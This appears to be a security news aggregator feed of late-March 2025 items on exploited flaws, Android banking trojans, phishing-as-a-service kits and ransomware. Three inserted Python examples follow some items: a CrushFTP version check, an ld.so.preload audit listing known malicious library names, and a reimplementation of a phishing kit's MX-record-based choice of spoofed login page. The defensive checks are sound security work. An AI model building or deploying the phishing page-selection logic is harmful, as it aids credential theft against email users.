    A new security issue is putting WordPress-powered websites at risk. Hackers are abusing the “Must-Use” plugins (MU-plugins) feature to hide malicious code and maintain long-term access on hacked websites. Read more in my article on the Hot for Security blog.

    Autosummary: Finally, if you suspect your WordPress-powered website could be hosting malicious MU-plugins, look in the wp-content/mu-plugins folder.


    Apple Backports Critical Fixes for 3 Live Exploits Impacting iOS and macOS Legacy Devices

    exploits
    2025-04-01 https://thehackernews.com/2025/04/apple-backports-critical-fixes-for-3.html
    Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the operating systems. The vulnerabilities in question are listed below - CVE-2025-24085 (CVSS score: 7.3) - A use-after-free bug in the Core Media component that could permit a malicious application already installed on a device to elevate



    Apple backports zero-day patches to older iPhones and Macs

    exploits
    2025-04-01 https://www.bleepingcomputer.com/news/security/apple-backports-zero-day-patches-to-older-iphones-and-macs/
    Apple has released security updates that backport fixes for actively exploited vulnerabilities that were exploited as zero-days to older versions of its operating systems. [...] "

    Autosummary: Specifically, the latest update for iOS 18.4 and iPadOS 18.4 fixes 77 vulnerabilities, including CVE-2025-30456 (app sandbox bypass allowing root privilege escalation), CVE-2025-24097 (arbitrary file metadata access), and CVE-2025-31182 (arbitrary file deletion). "


    Critical auth bypass bug in CrushFTP now exploited in attacks

    exploits
    2025-04-01 https://www.bleepingcomputer.com/news/security/critical-auth-bypass-bug-in-crushftp-now-exploited-in-attacks/
    Attackers are now targeting a critical authentication bypass vulnerability in the CrushFTP file transfer software using exploits based on publicly available proof-of-concept code. [...] "



    The AI Fix #44: AI-generated malware, and a stunning AI breakthrough

    exploits
    2025-04-01 https://grahamcluley.com/the-ai-fix-44/
    In episode 44 of The AI Fix, ChatGPT won’t build a crystal meth lab, GPT-4o improves the show’s podcast art, some students manage to screw in a lightbulb, Google releases Gemini 2.5 Pro Experimental and nobody notices, and Mark invents a clock for measuring AI time. Graham explains how ChatGPT’s love for Young Adult fiction can be used to turn it into an evil malware developer, and Mark looks at the ARC-AGI-2 benchmark and a staggering leap forward in AI intelligence. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley. "



    Attackers are targeting CrushFTP vulnerability with public PoC (CVE-2025-2825)

    exploits
    2025-04-01 https://www.helpnetsecurity.com/2025/04/01/crushftp-vulnerability-exploitation-cve-2025-2825/

    Exploitation attempts targeting the CVE-2025-2825 vulnerability on internet-facing CrushFTP instances are happening, the Shadowserver Foundation has shared on Monday, and the attackers have been leveraging publicly available PoC exploit code. What can be done? CVE-2025-2825, affecting CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0, is an authentication bypass vulnerability that may allow unauthenticated attackers to access CrushFTP servers through an exposed HTTP(S) port. The vulnerability was privately disclosed to CrushFTP customers via email on … More

    The post Attackers are targeting CrushFTP vulnerability with public PoC (CVE-2025-2825) appeared first on Help Net Security.


    Autosummary: CVE confusion: as it happens, CrushFTP's security advisories for versions 11 and 10 didn't list the flaw's CVE number until today, and the changelog for CrushFTP v11.3.1 – which includes the fix – still doesn't.
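
An inventory check against the affected ranges quoted above, as an added example that is not CrushFTP's or Help Net Security's code. It treats 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 as inclusive ranges and compares versions as integer tuples; a string comparison would rank "10.10.0" below "10.8.3" and misclassify it. The version-string format it parses and the host inventory at the bottom are assumptions made for the example.

```python
"""Version-range check for CVE-2025-2825 (added example, not CrushFTP's code).
Ranges are the ones the advisory lists, both inclusive. The inventory below is
constructed."""
import re

# Inclusive (low, high) ranges from the advisory.
AFFECTED_RANGES = (
    ((10, 0, 0), (10, 8, 3)),
    ((11, 0, 0), (11, 3, 0)),
)


def parse_version(text):
    """Return (major, minor, patch) from the leading X.Y.Z of a version string.

    Assumption for this example: the inventory field starts with a dotted
    triple, optionally prefixed by 'v' and followed by a build suffix."""
    m = re.match(r"\s*v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_affected(version):
    """True if the version falls inside one of the affected ranges."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def triage(inventory):
    """inventory: {host: version string}.

    Returns (to_patch, unknown): hosts inside an affected range, and hosts whose
    version could not be parsed and therefore need a manual look."""
    to_patch, unknown = [], []
    for host, version in sorted(inventory.items()):
        try:
            if is_affected(version):
                to_patch.append(host)
        except ValueError:
            unknown.append(host)
    return to_patch, unknown


if __name__ == "__main__":
    # Constructed inventory for the example.
    sample = {
        "ftp-a.example.invalid": "11.3.0",
        "ftp-b.example.invalid": "11.3.1_build",
        "ftp-c.example.invalid": "10.8.3",
        "ftp-d.example.invalid": "unknown",
    }
    patch, manual = triage(sample)
    print("patch:", patch)
    print("check manually:", manual)
```

Hosts that fail to parse are reported rather than silently skipped, because an unparseable version field is usually a stale inventory entry rather than a safe host.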


    Stellar Cyber Open Cybersecurity Alliance enhances threat detection and response

    ciber
    2025-04-01 https://www.helpnetsecurity.com/2025/04/01/stellar-cyber-open-cybersecurity-alliance/

    Stellar Cyber launched its Open Cybersecurity Alliance based on its award-winning Open XDR platform. This initiative streamlines security operations, improves interoperability, and enhances threat detection and response for enterprises and MSSPs. The new alliance challenges the idea that in order to be effective, ecosystems must be built on proprietary data or a closed model, with a “members-only” approach advocating for a specific data format. The Open Cybersecurity Alliance takes a completely different approach by enabling … More

    The post Stellar Cyber Open Cybersecurity Alliance enhances threat detection and response appeared first on Help Net Security.


    Autosummary: The newly launched ecosystem already features integrations with top security platforms across many different categories, including endpoint detection and response (EDR), identity and access management (IAM), privileged access security (PAS), secure access service edge (SASE), next-generation firewall, email security, vulnerability management (VM), cloud security, infrastructure as a service (IaaS), software as a service (SaaS), and more. "At Netskope, we are committed to delivering modern security, networking, and analytics solutions that empower organizations to protect their users and data, regardless of where they work," said Andy Horwitz, SVP of Global Partner Ecosystems at Netskope. By openly integrating with best-in-class solutions across all aspects of the security stack, customers can add speed and scale to their security operations with increased visibility, more accurate threat correlation, and better response times via a unified, easy-to-use technology alliance ecosystem.


    Lucid PhaaS Hits 169 Targets in 88 Countries Using iMessage and RCS Smishing

    financial
    2025-04-01 https://thehackernews.com/2025/04/lucid-phaas-hits-169-targets-in-88.html
    A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via Apple iMessage and Rich Communication Services (RCS) for Android. Lucid's unique selling point lies in its weaponizing of legitimate communication platforms to sidestep traditional SMS-based detection mechanisms. "Its scalable,

    Autosummary: The development comes as Barracuda warned of a "massive spike" in PhaaS attacks in early 2025 using Tycoon 2FA, EvilProxy, and Sneaky 2FA, with each service accounting for 89%, 8%, and 3% of all the PhaaS incidents, respectively. "


    CrushFTP CVE-2025-2825 flaw actively exploited in the wild

    exploits
    2025-04-01 https://securityaffairs.com/176097/hacking/crushftp-cve-2025-2825-flaw-actively-exploited.html
    Attackers exploit CrushFTP CVE-2025-2825 flaw, enabling unauthenticated access to unpatched devices using public proof-of-concept code. Threat actors are exploiting a critical authentication bypass vulnerability, tracked as CVE-2025-2825, in the CrushFTP file transfer software. Attackers are using exploits based on publicly available proof-of-concept exploit code. The vulnerability impacts CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0, it […] "

    Autosummary: Threat actors, including the ransomware group Cl0p, are known for attacking file transfer software such as Accellion FTA, MOVEit Transfer, GoAnywhere MFT, and Cleo.


    We Smell a (DC)Rat: Revealing a Sophisticated Malware Delivery Chain

    exploits
    2025-04-01 https://www.bleepingcomputer.com/news/security/we-smell-a-dcrat-revealing-a-sophisticated-malware-delivery-chain/
    A RAR file, a fake summons, and a Nietzsche quote—all part of a multi-stage malware chain delivering DCRat & Rhadamanthys. Acronis TRU breaks down how attackers use VBS, batch, and PowerShell scripts to slip past defenses. [...] "

    Autosummary: The multi-stage process, involving multiple script languages and obfuscation techniques, can effectively bypass security solutions, leading to unauthorized access, data theft, and system compromise. The Nietzsche quote carried in the lure reads: "In individuals, insanity is rare; but in groups, parties, nations, and epochs, it is the rule."


    How to recognize and prevent deepfake scams

    financial
    2025-03-31 https://www.helpnetsecurity.com/2025/03/31/how-to-prevent-deepfake-scams/

    Deepfakes are a type of synthetic media created using AI and machine learning. In simple terms, they produce videos, images, audio, or text that look and sound real, even though the events depicted never actually happened. These altered clips spread across social media, messaging apps, and video-sharing platforms, blurring the line between reality and fiction. The term “deepfake” was coined in 2017 when a Reddit user created a subreddit with that name. This subreddit was … More

    The post How to recognize and prevent deepfake scams appeared first on Help Net Security.


    Autosummary: At first, people used deepfakes for entertainment and fun, but over time, they have become a dangerous tool in the hands of criminals for fraud, identity theft, blackmail, and spreading misinformation. With the availability of various AI tools, ranging from open-source software (DeepFaceLab, Faceswap) to mobile applications (Zao, Reface), making a deepfake now requires little more than a laptop or smartphone and the right software.


    ⚡ Weekly Recap: Chrome 0-Day, IngressNightmare, Solar Bugs, DNS Tactics, and More

    exploits industry
    2025-03-31 https://thehackernews.com/2025/03/weekly-recap-chrome-0-day.html
    Every week, someone somewhere slips up—and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights—and the unexpected "

    Autosummary: This week's list includes CVE-2025-2783, CVE-2025-2476 (Google Chrome), CVE-2025-2857 (Mozilla Firefox, Tor Browser), CVE-2025-1974 (Kubernetes NGINX Ingress Controller), CVE-2025-26512 (NetApp SnapCenter), CVE-2025-22230 (VMware Tools for Windows), CVE-2025-2825 (CrushFTP), CVE-2025-20229 (Splunk), CVE-2025-30232 (Exim), CVE-2025-1716, CVE-2025-1889, CVE-2025-1944, CVE-2025-1945 (picklescan), and CVE-2025-2294 (Kubio AI Page Builder plugin). 46 Flaws in Solar Inverters From Sungrow, Growatt, and SMA — As many as 46 security bugs have been discovered in products from three solar inverter vendors, Sungrow, Growatt, and SMA, that, if successfully exploited, could permit attackers to seize control of devices and cause potential power blackouts. The vulnerabilities, collectively named SUN:DOWN, "can be exploited to execute arbitrary commands on devices or the vendor's cloud, take over accounts, gain a foothold in the vendor's infrastructure, or take control of inverter owners' devices." Exploiting Car Infotainment System to Plant Spyware — NCC Group researchers Alex Plaskett and McCaulay Hudson have demonstrated a trio of zero-day exploits (CVE-2024-23928, CVE-2024-23929, and CVE-2024-23930) that could be weaponized to break into Pioneer DMH-WT7600NEX, gain shell access, and install malicious software on the in-vehicle infotainment (IVI) system. Previously, the duo revealed multiple vulnerabilities in Phoenix Contact CHARX SEC-3100, an electric vehicle (EV) charger controller, that could facilitate privilege escalation and remote code execution (CVE-2024-6788, CVE-2024-25994, CVE-2024-25995, and CVE-2024-25999). This malware harvests sensitive data such as system metadata, files matching certain extensions, running processes, installed software, and user credentials, as well as information from cryptocurrency wallets, messaging applications, and web browsers. Also called OrpaCrab, the sophisticated Linux-based backdoor is capable of surveillance, lateral movement, data exfiltration, system manipulation, and remote control. With support for multiple scanning modes, advanced discovery techniques, and customizable payloads, Dalfox offers deep insights into reflected, stored, and DOM-based XSS vulnerabilities, all while providing detailed, developer-friendly output. "These online forums or communities [...] see offenders collaborate or compete to cause harm across a broad spectrum of criminality – both on and offline – including cyber, fraud, extremism, serious violence, and child sexual abuse," the NCA said. Meta has announced that its AI-powered virtual assistant, Meta AI, is finally launching across Facebook, Instagram, WhatsApp, and Messenger in the European Union and United Kingdom over the coming weeks.


    Morphing Meerkat phishing kits exploit DNS MX records

    financial exploits
    2025-03-31 https://securityaffairs.com/176029/cyber-crime/morphing-meerkat-phishing-kits-exploit-dns-mx.html
    Morphing Meerkat phishing kits exploit DNS MX records to deliver spoofed login pages, targeting over 100 brands. Infoblox researchers discovered a new phishing-as-a-service (PhaaS) platform that generated multiple phishing kits, called Morphing Meerkat, using DNS mail exchange (MX) records to deliver fake login pages and targeting over 100 brands. Threat actors are exploiting DNS techniques […] "

    Autosummary: Infoblox researchers discovered a new phishing-as-a-service (PhaaS) platform, Morphing Meerkat, that generated multiple phishing kits using DNS mail exchange (MX) records to deliver fake login pages, targeting over 100 brands.
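
The selection step the write-up describes, choosing which brand's spoofed login page to serve from the MX records of the victim's email domain, as an added example that is not Infoblox's code or the kit's. The MX hostnames, the suffix-to-template table and the stand-in resolver are all constructed for the example; the kit's real mapping and template set are not on the page.

```python
"""MX-record-driven template selection (added example, not the kit's code).
The table and the fake resolver are constructed for illustration."""

# Suffix of the primary MX host -> template to render. Constructed table.
MX_TEMPLATES = {
    "google.com": "gmail",
    "googlemail.com": "gmail",
    "outlook.com": "microsoft365",      # also covers *.mail.protection.outlook.com
    "yahoodns.net": "yahoo",
    "secureserver.net": "godaddy-webmail",
}
FALLBACK_TEMPLATE = "generic-webmail"

# Constructed stand-in for a DNS resolver: domain -> [(priority, host)].
FAKE_MX_TABLE = {
    "victim-corp.example": [(10, "victim-corp-example.mail.protection.outlook.com.")],
    "smallbiz.example": [(20, "alt1.aspmx.l.google.com."), (10, "aspmx.l.google.com.")],
    "selfhosted.example": [(10, "mx1.selfhosted.example.")],
    "nomail.example": [],
}


def normalise_host(host):
    """Strip the trailing dot of an FQDN and lower-case it for matching."""
    return host.rstrip(".").lower()


def pick_template(mx_records):
    """Choose a template from a list of (priority, host) MX records.

    The lowest priority value is the primary mail server; its hostname is matched
    against the suffix table, longest suffix first, so a more specific entry
    would beat a broader one."""
    if not mx_records:
        return FALLBACK_TEMPLATE
    _, primary = min(mx_records, key=lambda rec: rec[0])
    host = normalise_host(primary)
    for suffix in sorted(MX_TEMPLATES, key=len, reverse=True):
        if host == suffix or host.endswith("." + suffix):
            return MX_TEMPLATES[suffix]
    return FALLBACK_TEMPLATE


def template_for_email(address, resolver=FAKE_MX_TABLE):
    """Map a victim email address to the template the page would render.

    `resolver` is a dict standing in for a live MX lookup (assumption for the
    example); a real page would have to query a DNS-over-HTTPS endpoint, since
    browser script cannot issue raw DNS queries."""
    domain = address.rsplit("@", 1)[-1].lower()
    return pick_template(resolver.get(domain, []))


if __name__ == "__main__":
    for addr in ("cfo@victim-corp.example", "owner@smallbiz.example",
                 "admin@selfhosted.example", "nobody@nomail.example"):
        print(addr, "->", template_for_email(addr))
```

Two consequences for defenders follow from this logic. The same phishing URL renders different brands for different victims, so a sandbox that opens the link without a realistic victim address only ever sees the fallback template. And because the page must reach a DNS-over-HTTPS resolver to learn the MX record, a web page issuing DoH queries from client-side script is a behaviour worth alerting on in browser telemetry.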


    CISA reveals new malware variant used on compromised Ivanti Connect Secure devices

    exploits
    2025-03-31 https://www.helpnetsecurity.com/2025/03/31/cisa-reveals-new-malware-variant-used-on-compromised-ivanti-connect-secure-devices/

    CISA has released indicators of compromise, detection signatures, and updated mitigation advice for rooting out a newly identified malware variant used by the attackers who breached Ivanti Connect Secure VPN appliances in December 2024 by exploiting the CVE-2025-0282 zero-day. The updated mitigation instructions stress the importance of conducting a factory reset of all devices – even those where threat hunting did not reveal evidence of compromise – as well as a factory reset of cloud … More

    The post CISA reveals new malware variant used on compromised Ivanti Connect Secure devices appeared first on Help Net Security.




    EU invests €1.3 billion in AI and cybersecurity

    ciber
    2025-03-31 https://www.helpnetsecurity.com/2025/03/31/eu-digital-work-programme-funding/

    The European Commission has approved the 2025-2027 Digital Europe Programme (DIGITAL) work program, allocating €1.3 billion to advance key technologies essential for the EU’s future and technological sovereignty. DIGITAL is an EU funding initiative designed to bring digital technology closer to businesses, citizens, and public administrations. Digital technology is essential for communication, work, science, and tackling environmental challenges. The COVID-19 pandemic highlighted Europe’s reliance on external systems, while Russia’s war against Ukraine exposed vulnerabilities in … More

    The post EU invests €1.3 billion in AI and cybersecurity appeared first on Help Net Security.


    Autosummary: With a total budget exceeding €8.1 billion, the program focuses on several key areas such as supercomputing, artificial intelligence, cybersecurity, advanced digital skills, and the widespread adoption of digital technologies across the economy and society. "


    Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images

    exploits
    2025-03-31 https://thehackernews.com/2025/03/hackers-exploit-wordpress-mu-plugins-to.html
    Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the "



    Phishing platform "Lucid" behind wave of iOS, Android SMS attacks

    financial
    2025-03-31 https://www.bleepingcomputer.com/news/security/phishing-platform-lucid-behind-wave-of-ios-android-sms-attacks/
    A phishing-as-a-service (PhaaS) platform named "Lucid" has been targeting 169 entities in 88 countries using well-crafted messages sent on iMessage (iOS) and RCS (Android). [...] "

    Autosummary: Victims clicking on the phishing links are redirected to fake landing pages impersonating state government toll and parking agencies or private entities, such as USPS, DHL, Royal Mail, FedEx, Revolut, Amazon, American Express, HSBC, E-ZPass, SunPass, Transport for London, and more. "


    Russian Hackers Exploit CVE-2025-26633 via MSC EvilTwin to Deploy SilentPrism and DarkWisp

    exploits rusia-ucrania
    2025-03-31 https://thehackernews.com/2025/03/russian-hackers-exploit-cve-2025-26633.html
    The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. "The threat actor deploys payloads primarily by means of "

    Autosummary: Rhadamanthys is far from the only stealer in Water Gamayun's arsenal, for it has been observed delivering another commodity stealer called StealC, as well as three custom PowerShell variants referred to as EncryptHub Stealer variant A, variant B, and variant C. The bespoke stealer is fully-featured malware that can collect extensive system information, including details about antivirus software, installed software, network adapters, and running applications.


    U.S. CISA adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-31 https://securityaffairs.com/176073/hacking/u-s-cisa-adds-cisco-smart-licensing-utility-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco Smart Licensing Utility vulnerability, tracked as CVE-2024-20439, to its Known Exploited Vulnerabilities (KEV) catalog. Last week, Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, […] "

    Autosummary: Last week, Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, a static credential backdoor, and CVE-2024-20440, an information disclosure flaw. "


    RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

    exploits
    2025-03-30 https://thehackernews.com/2025/03/resurge-malware-exploits-ivanti-flaw.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has shed light on a new malware called RESURGE that has been deployed as part of exploitation activity targeting a now-patched security flaw in Ivanti Connect Secure (ICS) appliances. "RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that "

    Autosummary: RESURGE ("libdsupgrade.so"), per CISA, is an improvement over SPAWNCHIMERA with support for three new commands: (1) insert itself into "ld.so.preload", set up a web shell, manipulate integrity checks, and modify files; (2) enable the use of web shells for credential harvesting, account creation, password resets, and privilege escalation; (3) copy the web shell to the Ivanti running boot disk and manipulate the running coreboot image. CISA said it also unearthed two other artifacts from an unspecified critical infrastructure entity's ICS device: a variant of SPAWNSLOTH ("liblogblock.so") contained within RESURGE and a bespoke 64-bit Linux ELF binary ("dsmain").
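
An audit of the persistence hook named above, /etc/ld.so.preload, as an added example that is not CISA's or Ivanti's code. Every library listed in that file is injected into each dynamically linked process on the host, so on an appliance it should be absent or empty. The check takes the file contents as text so it can be run over a copy pulled from a disk image rather than on the live device, whose integrity checks the report says RESURGE manipulates. The two library names come from the item above; the sample file contents are constructed.

```python
"""Audit /etc/ld.so.preload contents (added example, not CISA's code). Known
names are the ones the CISA analysis lists on the page: libdsupgrade.so
(RESURGE) and liblogblock.so (SPAWNSLOTH variant). The sample is constructed."""
import os

KNOWN_BAD_NAMES = {"libdsupgrade.so", "liblogblock.so"}
SYSTEM_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def parse_preload(text):
    """Return the library entries: whitespace separated, '#' starts a comment,
    mirroring how the glibc loader reads the file."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        entries.extend(line.split())
    return entries


def audit_preload(text):
    """Return one finding per entry: {'entry': path, 'reasons': [...]}.

    Every entry is reported, because a populated preload file is itself
    unexpected on an appliance; stronger reasons are appended for known
    malicious names, relative paths and libraries outside system directories."""
    findings = []
    for entry in parse_preload(text):
        reasons = ["preload_entry_present"]
        if os.path.basename(entry) in KNOWN_BAD_NAMES:
            reasons.append("known_malicious_name")
        if not entry.startswith("/"):
            reasons.append("relative_path")
        elif not entry.startswith(SYSTEM_LIB_DIRS):
            reasons.append("outside_system_lib_dirs")
        findings.append({"entry": entry, "reasons": reasons})
    return findings


# Constructed sample, not a capture from a real appliance.
SAMPLE_PRELOAD = """\
# constructed /etc/ld.so.preload
/lib/libdsupgrade.so
/tmp/.cache/libhelper.so
"""

if __name__ == "__main__":
    for finding in audit_preload(SAMPLE_PRELOAD):
        print(finding["entry"], "->", ", ".join(finding["reasons"]))
```

A library that sits in a system directory and is not on the known-name list still gets a finding, since the name list covers only what has been published; the decision to treat any entry as suspicious is what makes the check hold up against a renamed sample. Given the updated guidance in the CISA item further up, which calls for a factory reset even where hunting finds nothing, the output is evidence for scoping the incident rather than a substitute for the reset.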


    New Crocodilus malware steals Android users’ crypto wallet keys

    exploits
    2025-03-30 https://www.bleepingcomputer.com/news/security/new-crocodilus-malware-steals-android-users-crypto-wallet-keys/
    A newly discovered Android malware dubbed Crocodilus tricks users into providing the seed phrase for the cryptocurrency wallet using a warning to back up the key to avoid losing access. [...] "

    Autosummary: The bot component of the malware supports a set of 23 commands that it can execute on the device, including: enable call forwarding; launch a specific application; post a push notification; send SMS to all contacts or a specified number; get SMS messages; request Device Admin privileges; enable a black overlay; enable/disable sound; lock the screen; make itself the default SMS manager. The malware also offers remote access trojan (RAT) functionality, which enables its operators to tap on the screen, navigate the user interface, perform swipe gestures, and more.


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 39

    exploits
    2025-03-30 https://securityaffairs.com/176022/malware/security-affairs-malware-newsletter-round-39.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Microsoft Trusted Signing service abused to code-sign malware; Shedding light on the ABYSSWORKER driver; VSCode Marketplace Removes Two Extensions Deploying Early-Stage Ransomware; New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI; Raspberry Robin: Copy […]



    Sam’s Club Investigates Alleged Cl0p Ransomware Breach

    exploits ransomware
    2025-03-30 https://securityaffairs.com/175999/cyber-crime/sams-club-investigates-alleged-cl0p-ransomware-breach.html
    The Walmart-owned membership warehouse club chain Sam’s Club is investigating claims of a Cl0p ransomware security breach. Sam’s Club is a membership warehouse club chain in the United States, owned by Walmart. Founded in 1983 by Sam Walton, Walmart’s founder, as Sam’s Wholesale Club, it was renamed Sam’s Club in 1990. These stores operate on a bulk […] "

    Autosummary: "New Clop Ransomware CLEO victim list," Dominic Alvieri (@AlvieriD) posted on January 15, 2025. In December 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2024-50623 (CVSS score 8.8), which impacts multiple Cleo products, to its Known Exploited Vulnerabilities (KEV) catalog. "On December 3, Huntress identified an emerging threat involving Cleo's LexiCom, VLTransfer, and Harmony software, commonly used to manage file transfers."


    CISA warns of RESURGE malware exploiting Ivanti flaw

    exploits
    2025-03-30 https://securityaffairs.com/176040/breaking-news/cisa-warns-of-resurge-malware-exploiting-ivanti-flaw.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of RESURGE malware, targeting a vulnerability in Ivanti Connect Secure (ICS) appliances. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published a Malware Analysis Report (MAR) on a new malware called RESURGE. The malicious code has been used in attacks targeting the flaw CVE-2025-0282 in Ivanti Connect […] "

    Autosummary: It acts as a rootkit, dropper, backdoor, bootkit, proxy, and tunneler.


    BlackLock Ransomware Exposed After Researchers Exploit Leak Site Vulnerability

    exploits ransomware
    2025-03-29 https://thehackernews.com/2025/03/blacklock-ransomware-exposed-after.html
    In what's an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract

    Autosummary: Some of the notable findings are listed below: the use of Rclone to exfiltrate data to the MEGA cloud storage service, in some cases even installing the MEGA client directly on victim systems; the threat actors have created at least eight accounts on MEGA using disposable email addresses created via YOPmail (e.g., "zubinnecrouzo-6860@yopmail.com") to store the victim data; a reverse engineering of the ransomware has uncovered source code and ransom note similarities with another ransomware strain codenamed DragonForce, which has targeted organizations in Saudi Arabia (while DragonForce is written in Visual C++, BlackLock uses Go); "$$$," one of the main operators of BlackLock, launched a short-lived ransomware project called Mamona on March 11, 2025. In an intriguing twist, BlackLock's DLS was defaced by DragonForce on March 20 – likely by exploiting the same LFI vulnerability (or something similar) – with configuration files and internal chats leaked on its landing page.


    New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials

    financial exploits
    2025-03-29 https://thehackernews.com/2025/03/new-android-trojan-crocodilus-abuses.html
    Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that's primarily designed to target users in Spain and Turkey. "Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging,"

    Autosummary: Some of the important features supported by the malware are listed below: launch specified application; self-remove from the device; post a push notification; send SMS messages to all/select contacts; retrieve contact lists; get a list of installed applications; get SMS messages; request Device Admin privileges; enable black overlay; update C2 server settings; enable/disable sound; enable/disable keylogging; make itself a default SMS manager. "The emergence of the Crocodilus mobile banking Trojan marks a significant escalation in the sophistication and threat level posed by modern malware," ThreatFabric said.


    U.S. seized $8.2 million in crypto linked to "Romance Baiting" scams

    financial
    2025-03-29 https://www.bleepingcomputer.com/news/cryptocurrency/us-seized-82-million-in-crypto-linked-to-romance-baiting-scams/
    The U.S. Department of Justice (DOJ) has seized over $8.2 million worth of USDT (Tether) cryptocurrency that was stolen via "romance baiting" scams. [...] "

    Autosummary: The worst-case individual loss described in the complaint was that of a victim from Mentor, Ohio, who lost approximately $663,352 in total ($250,000 in initial investment, $174,400 in "release fees," $238,946 in "handling fees"). "


    Experts warn of the new sophisticated Crocodilus mobile banking Trojan

    financial exploits
    2025-03-29 https://securityaffairs.com/175976/malware/new-sophisticate-crocodilus-mobile-banking-trojan.html
    The new Android trojan Crocodilus exploits accessibility features to steal banking and crypto credentials, mainly targeting users in Spain and Turkey. ThreatFabric researchers discovered a new Android trojan called Crocodilus, which exploits accessibility features to steal banking and crypto credentials. “Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from […] "

    Autosummary: RAT Capabilities: Screen Interaction & Control: Performs swipes, clicks, and button presses (Back, Home, Menu). “Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging.” "


    £3 million fine for healthcare MSP with sloppy security after it was hit by ransomware attack

    exploits ransomware
    2025-03-29 https://www.exponential-e.com/blog/3-million-fine-for-healthcare-msp-with-sloppy-security-after-it-was-hit-by-ransomware-attack
    A UK firm has been hit by a £3.07 million fine after being hit by a ransomware attack that exposed sensitive data related to almost 80,000 people, and disrupted NHS services. Read more in my article on the Exponential-e blog. "



    Android financial threats: What businesses need to know to protect themselves and their customers

    financial
    2025-03-28 https://www.helpnetsecurity.com/2025/03/28/android-financial-threats/

    The rise of mobile banking has changed how businesses and customers interact. It brought about increased convenience and efficiency, but has also opened new doors for cybercriminals, particularly on the Android platform, which dominates the global smartphone market. According to ESET research, Android financial threats, targeting banking apps and cryptocurrency wallets, grew by 20% in H2 of 2024 compared to the first half of the year. Fortunately, large financial institutions like banks have significant resources, … More

    The post Android financial threats: What businesses need to know to protect themselves and their customers appeared first on Help Net Security.


    Autosummary: This approach combines something the user knows (e.g., a password), something they have (e.g., a smartphone or security token), and something they are (e.g., biometric data such as fingerprints or facial recognition). Once installed, these apps function as fake banking interfaces, obtaining sensitive data by phishing or other means and transmitting it to attackers. User-friendly security measures, such as biometric authentication or password managers, should be intuitive and easy to use, encouraging businesses and their employees to adopt and maintain these practices long-term.


    Cybersecurity spending set to jump 12.2% in 2025

    ciber
    2025-03-28 https://www.helpnetsecurity.com/2025/03/28/idc-cybersecurity-spending-2025/

    Global cybersecurity spending is expected to grow by 12.2% in 2025, according to the latest forecast from the IDC Worldwide Security Spending Guide. The rise in cyber threats is pushing organizations to invest more in their defenses. AI tools are making these threats more sophisticated, which is adding to the urgency. IDC says this steady climb in spending will continue through 2028, hitting $377 billion by then. The U.S. and Western Europe will still make … More

    The post Cybersecurity spending set to jump 12.2% in 2025 appeared first on Help Net Security.


    Autosummary: Banking, federal/central government, telecommunications, capital markets, and healthcare providers will be the industries spending the most at the global level on security in 2025, while the fastest-growing will be capital markets, media and entertainment, and life sciences, with expected year-on-year growth rates of 19.4%, 17.1%, and 16.9%, respectively, in 2025. "


    Healthcare’s alarming cybersecurity reality

    ciber
    2025-03-28 https://www.helpnetsecurity.com/2025/03/28/healthcare-devices-vulnerabilities/

